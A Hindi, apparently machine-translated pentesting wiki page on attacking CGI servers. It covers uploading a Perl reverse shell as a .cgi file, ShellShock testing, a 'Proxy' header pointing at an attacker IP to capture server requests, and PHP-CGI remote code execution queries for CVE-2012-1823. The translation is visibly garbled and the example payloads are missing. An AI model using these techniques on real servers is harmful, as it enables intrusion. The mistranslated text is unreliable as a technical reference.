CGI
जानकारी
CGI स्क्रिप्ट्स पर्ल स्क्रिप्ट्स होते हैं, इसलिए, यदि आपने एक सर्वर को कंप्रोमाइज़ किया है जो .cgi स्क्रिप्ट्स को निष्पादित कर सकता है, तो आप एक पर्ल रिवर्स शैल (/usr/share/webshells/perl/perl-reverse-shell.pl
) अपलोड कर सकते हैं, एक्सटेंशन को .pl से .cgi में बदलें, एक्सीक्यूट परमिशन्स दें (chmod +x
) और उसे वेब ब्राउज़र से एक्सेस करके रिवर्स शैल को एक्सीक्यूट कर सकते हैं। CGI vulns के लिए टेस्ट करने के लिए nikto -C all
(और सभी प्लगइन्स) का उपयोग करना सुझावित है।
ShellShock
ShellShock एक वंशावली है जो Unix आधारित ऑपरेटिंग सिस्टम में व्यापक रूप से उपयोग किए जाने वाले Bash कमांड-लाइन शैल में प्रभाव डालती है। यह ऐप्लिकेशन्स द्वारा पारित किए गए कमांड्स को चलाने की क्षमता को लक्ष्य बनाता है। वंशावली उन पर्यावरण चर के मनिपुलेशन में है, जो डायनामिक नामित मान हैं जो प्रक्रियाओं को कैसे चलाते हैं को प्रभावित करते हैं। हमलावर इसे उपयोगकर्ता चरों में कुप्रयोगी कोड जोड़कर इसे एक्सीक्यूट कर सकते हैं, जो चर प्राप्त करने पर निष्पादित होता है। इससे हमलावर संभावित रूप से सिस्टम को कंप्रमाइज़ कर सकते हैं।
इस वंशावली का शिकार होने पर पेज एक त्रुटि फेंक सकता है।
आप इस वंशावली को खोज सकते हैं जानकारी के आधार पर कि यह पुराना एपाची संस्करण और cgi_mod (cgi फ़ोल्डर के साथ) का उपयोग कर रहा है या nikto का उपयोग कर रहा है।
परीक्षण
अधिकांश परीक्षण एक कुछ चीज़ को इको करने पर आधारित हैं और उम्मीद करते हैं कि वह स्ट्रिंग वेब प्रतिक्रिया में वापस लौट जाएगा। यदि आपको लगता है कि कोई पेज वंशावली हो सकता है, तो सभी cgi पेजों की खोज करें और उन्हें परीक्षण करें।
Nmap
कर्ल (प्रतिबिंबित, अंधा और आउट-ऑफ-बैंड)
शारीरिक लाभ
प्रॉक्सी (MitM से वेब सर्वर अनुरोध)
CGI हर http अनुरोध में प्रत्येक हेडर के लिए एक वातावरणीय चर बनाता है। उदाहरण के लिए: "host:web.com" को "HTTP_HOST"="web.com" के रूप में बनाया जाता है।
जैसे ही वेब सर्वर द्वारा HTTP_PROXY चर का उपयोग किया जा सकता है। कोशिश करें कि एक हेडर भेजें जिसमें "प्रॉक्सी: <IP_हमलावर>:<पोर्ट>" शामिल हो और यदि सत्र के दौरान सर्वर कोई अनुरोध करता है। तो आप सर्वर द्वारा किए गए प्रत्येक अनुरोध को कैप्चर कर सकेंगे।
पुराना PHP + CGI = RCE (CVE-2012-1823, CVE-2012-2311)
मूल रूप से यदि cgi सक्रिय है और php "पुराना" है (<5.3.12 / < 5.4.2) तो आप कोड को निष्पादित कर सकते हैं। इस भयानकता का शोधन करने के लिए आपको कुछ PHP फ़ाइल तक पहुंचने की आवश्यकता है बिना पैरामीटर भेजे (विशेष रूप से "=" चर भेजे बिना)। फिर, इस भयानकता का परीक्षण करने के लिए, आप उदाहरण के लिए /index.php?-s
तक पहुंच सकते हैं और अनुप्रयोग का स्रोत कोड प्रतिक्रिया में दिखाई देगा।
फिर, RCE प्राप्त करने के लिए आप इस विशेष क्वेरी को भेज सकते हैं: /?-d allow_url_include=1 -d auto_prepend_file=php://input
और PHP कोड को **अनुरोध के शरीर में निष्पादित करने के लिए। उदाहरण:
वल्न और संभावित उत्पीड़न के बारे में अधिक जानकारी: https://www.zero-day.cz/database/337/, cve-2012-1823, cve-2012-2311, CTF Writeup Example.
Last updated